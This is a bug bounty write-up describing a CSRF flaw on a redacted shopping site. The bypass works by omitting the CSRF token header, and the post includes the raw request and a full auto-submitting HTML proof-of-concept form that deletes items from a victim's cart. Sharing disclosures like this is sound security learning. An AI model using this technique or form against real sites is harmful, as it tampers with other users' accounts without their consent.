CSRF to Delete Products From Any User Cart Lead To $$$
قَالَ اللَّهُ تَعَالَى: “يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ ۚ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ” (سورة المجادلة، الآية 11).
Hello Again Hunters! I’m excited to share something interesting I found while testing a private bug bounty program on an online shopping website.
I discovered a CSRF vulnerability that let me delete items from any user’s cart without their permission.
Let’s take a closer look at how it worked and why it matters.
Let’s dive in!
The application allows users to create custom projects (e.g., photo books, prints) and add them to their shopping cart.
Now i started to test and see what happen when delete a product from the shopping cart
When a user removes an product from their cart, a POST request is sent to the following endpoint:
POST /cart/updatecart
Host: [redacted]The request body contains several parameters that specify which Products to remove:
arrayOfProjectIdsToRemove=[ID]
&sourceProjectId=
&promotionName=
&isCouponRemoved=false
&order_id=ID
&service=cartAlso There is a Problem here that is the request contain a header for CSRF TOKEN , Like That
X-Csrf-Token: [token]Now The Full Request be like that :
POST /cart/updatecart HTTP/2
Host: Target.com
Cookie: [your session cookie]
X-Csrf-Token: [token]
Content-Type: application/x-www-form-urlencoded
arrayOfProjectIdsToRemove=ID&sourceProjectId=&promotionName=&isCouponRemoved=false&order_id=ID&service=cartNow We Have Tow(2) Problems
- The Application Request Have CSRF Token :
X-CSRF-Token - The Request Contain 2 IDs :
- The
arrayOfProjectIdaToRemoveParameter - The
order_idParameter
So Let’s Start with the CSRF Token…
What I Do ?
The First Thing I Do when see any CSRF Token and The easiest way to test it that is just try to delete it and send the request without this token and check if the server accept it without any error or no and if that is done , here i bypassed the CSRF protection with easy way
Now what i did it’s removed that token and the server got me 200 Ok , without any error !!!
Now The Other Problem : The Request IDs…
Like What I said the request have tow parameters have IDs Value
First arrayOfProjectIdaToRemove
This Id is for the Product i need to remove from the cart (the application give every product ID as identifier for it ), so here just what i need to know that is the product of the victim then i get his id normally from any request treat with that product
The Second parameter order_id
I spent some time to check that ID is what and how the application give it to the request , and after some time i saw that this ID for every product at the chart , but how also the attacker can guess this ID? after some time i got no answer , so i decided to report it but when calculate the cvss i will put the attack complexity is high because the attacker may need other attacks to get the order_id value
The Full CSRF PoC…..
Since the request used normal form data, I knew I could build a simple HTML form that does the same thing. I made a page with a hidden form and some JavaScript to auto-submit it.
Here’s what the code looked like:
<html>
<body>
<form action="https://[target]/cart/updatecart" method="POST">
<input type="hidden" name="arrayOfProjectIdsToRemove" value="["ID"]" />
<input type="hidden" name="sourceProjectId" value="" />
<input type="hidden" name="promotionName" value="" />
<input type="hidden" name="isCouponRemoved" value="false" />
<input type="hidden" name="order_id" value="ID" />
<input type="hidden" name="service" value="cart" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>The Program Response…..
I reported it and spent some time , but what i don’t believe it until now, the H1 Triage Closed The Report as Duplicate, that is so bad for me
But Here i noticed something strange ……
The triage team didn’t mention any information about the original report
No title ,No status , No date !!! , strange right ?
So here i send a comment say i need to know the original report info !!
And After some of days , i got a notification say that the report is reopened !!! , also the triage team validated the bug again and sent it to the internal team
After 2 days the internal team triaged the report !!!!
and after other 1 day they paid for it with $$$ !!!
But What is the severity here ?
You can see the CVSS Above
I hope anyone reading this has been able to learn something new or refresh his memory. Remember to put God first, and to test everything. In hacking, no idea is stupid until it clearly fails. I wish you good-luck, and if you find a bug with this technique, I’d love to hear about it.
My linkedin :) https://www.linkedin.com/in/yassin-hamdi-elfeki0/
— @ GET /BountyOrDie
